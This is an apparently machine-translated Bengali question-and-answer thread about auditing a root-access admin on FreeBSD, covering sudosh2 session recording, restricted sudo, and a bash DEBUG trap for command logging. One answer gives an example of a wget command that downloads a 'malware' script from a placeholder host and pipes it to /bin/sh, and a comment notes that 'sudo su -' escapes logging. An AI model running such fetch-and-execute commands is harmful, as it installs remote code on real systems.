মূল থেকে নির্বাহিত প্রতিটি কমান্ড লগ করুন

16

আমি আমার রুট সার্ভারটিতে একটি বাহ্যিক সিস্টেম প্রশাসকের কাছে অ্যাক্সেস দিতে চাই, তবে আমি আমার সার্ভারের সাথে তিনি কী করছেন, তার দ্বিগুণ পরীক্ষা করা নিশ্চিত করতে চাই, যেমন ডেটা অনুলিপি করে আমি এগুলি করতে চাই না ইত্যাদি ইত্যাদি। আমি কেবল পঠন-পাঠ্য এবং সম্পাদিত নয় এমন কোনও ফাইল অ্যাক্সেস করেও তার ট্র্যাক নিতে চাই।

আমি এটা কিভাবে করবো?

security freebsd

— cedivad
সূত্র

1

এই সম্পর্কিত প্রশ্নটি দেখুন: সার্ভারফল্ট / প্রশ্ন / 181131/… ?

— স্টিফান লাসিউইস্কি

21

বিশ্বাস কিন্তু যাচাই!

পরীক্ষা করে দেখুন sudosh2 । সুদোশ 2 ফ্রিবিএসডি বন্দরগুলি সরবরাহ করে। প্যাকেজগুলি রেডহ্যাট এবং উবুন্টুর জন্য উপলব্ধ। এখানে তাদের ওয়েবসাইট থেকে বর্ণনা:

সুদোষ একটি অডিটিং শেল ফিল্টার এবং লগইন শেল হিসাবে ব্যবহার করা যেতে পারে। সুদোষ সমস্ত কীস্ট্রোক এবং আউটপুট রেকর্ড করে এবং ভিসিআরের মতো সেশনটি খেলতে পারে।

সুদোষ আপনাকে ব্যবহারকারীর সেশনটি পুনরায় খেলতে অনুমতি দেবে, যা আপনাকে ব্যবহারকারীরা যেমন দেখেছে তেমন সমস্ত ইনপুট এবং আউটপুট দেখতে দেবে । আপনি সবকিছু, কীস্ট্রোক, টাইপস, ব্যাকস্পেস, তারা কী সম্পাদনা করেছেন vi, আউটপুট wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/shইত্যাদি দেখতে পাচ্ছেন

সিসলোগে সুদোষ লগ প্রেরণ করা সম্ভব, যাতে সেগুলি সিস্টেম থেকে দূরে একটি কেন্দ্রীয় সিসলোগ সার্ভারে সংরক্ষণ করা যায়।

নোট করুন যে সুডোশ 2 সুডোশের প্রতিস্থাপন, যা এর লেখক পরিত্যাগ করেছিলেন

আপনি কি এমন একাডেমিক প্রতিষ্ঠানে কাজ করেন যেখানে ব্যবহারকারীরা সুপারউজারের প্রাইভেলজেস থাকার বিষয়ে জোর দিয়ে থাকেন? অথবা আপনি কোনও কর্পোরেশনে কাজ করেন এবং ব্যবহারকারীদের তাদের নিজস্ব ভিএম-তে সুপারউজার সুবিধা পাওয়ার অনুমতি দিতে চান? এটি আপনার জন্য সমাধান হতে পারে।

— স্টিফান লাসিউস্কি
সূত্র

1

দুর্দান্ত - আমি এর আগে সুদোশের কথা শুনিনি।

— EEAA

2

এই 'ভিসিআর' আপনি কীসের কথা বলছেন?

— টম মার্থেনাল

2

এটি 8-ট্র্যাকের মতো তবে আপনি নিজের টেলিভিশন শো রেকর্ড করতে পারবেন!

— স্টিফান লাসিউইস্কি

22

তাকে রুট অ্যাক্সেস দেবেন না। পরিবর্তে, তাকে একটি অননুমোদিত ব্যবহারকারী অ্যাকাউন্ট দিন এবং অনুরোধ করুন তিনি তার সমস্ত কাজ এটির মাধ্যমে করুন sudo, যা তার সমস্ত কমান্ড লগ করবে।

মনে রাখবেন যে যদি এই ব্যক্তির খারাপ উদ্দেশ্য থাকে এবং আপনি তাকে পুরো সুডোর সুযোগসুবিধা দেন তবে সে এই কমান্ডগুলি লগ না করেই এই দুষ্ট উদ্দেশ্যগুলি সম্পাদন করার একটি উপায় খুঁজে পাবে । এই ক্ষেত্রে, তার কাজটি করার জন্য তাকে কেবল নির্দিষ্ট আদেশগুলি অ্যাক্সেসের অনুমতি দিন।

— EEAA
সূত্র

আমি আমার জীবনকে ব্যথা না করে এটিকে যথাসম্ভব শক্ত করতে চাই। উত্তরের জন্য ধন্যবাদ.

— সিডিভাড

আপনি কেবল চালাতে পারেন sudo su -এবং লট করা হবে না এমন একটি মূল শেল থাকতে পারে (আপনি এটি শুরু না করে)। আমি সাধারণত এটি টাইপ করি যখন আমি একবারে মূল হিসাবে একক কমান্ডের চেয়ে বেশি কিছু করতে চাই, বা ডিরেক্টরিতে ট্যাব সমাপ্তি চাইলে সাধারণ ব্যবহারকারীরা পড়তে পারেন না।

— rjmunro

@ আরজমুনরো - ঠিক এই কারণেই আমি কেবল তাকে তার প্রয়োজনীয় সুনির্দিষ্ট অ্যাক্সেস দেওয়ার বিষয়ে সতর্কতা জারি করেছি। আপনি চান স্পষ্টভাবে নিষেধ করতে sudo su -পারেন।

— EEAA

1

আমি sudosh2 সাথে পরিচিত নই, কিন্তু আমি আমার নিম্নলিখিত করা .bashrcসব কমান্ড আমি টাইপ লগ ইন করার bashফাইলে শেল ~/.command_log:

# log every command typed and when
if [ -n "${BASH_VERSION}" ]; then
    trap "caller >/dev/null || \
printf '%s\\n' \"\$(date '+%Y-%m-%dT%H:%M:%S%z')\
 \$(tty) \${BASH_COMMAND}\" 2>/dev/null >>~/.command_log" DEBUG
fi

উপরেরটি একটি ফাঁদ সেট করে DEBUG, যা একটি সাধারণ কমান্ড কার্যকর হওয়ার ঠিক আগে সম্পাদিত হয়। callerবিল্ট-ইন পরীক্ষা কিনা কমান্ড একটি ইন্টারেক্টিভ শেল এ টাইপ করা হচ্ছে বা ভালো কিছু মাধ্যমে চালানোর জন্য ব্যবহার করা হয় .bashrc। মান ${BASH_COMMAND}কমান্ড বর্তমানে মৃত্যুদন্ড কার্যকর করা হচ্ছে ধারণ করে।

— রিচার্ড হ্যানসেন
সূত্র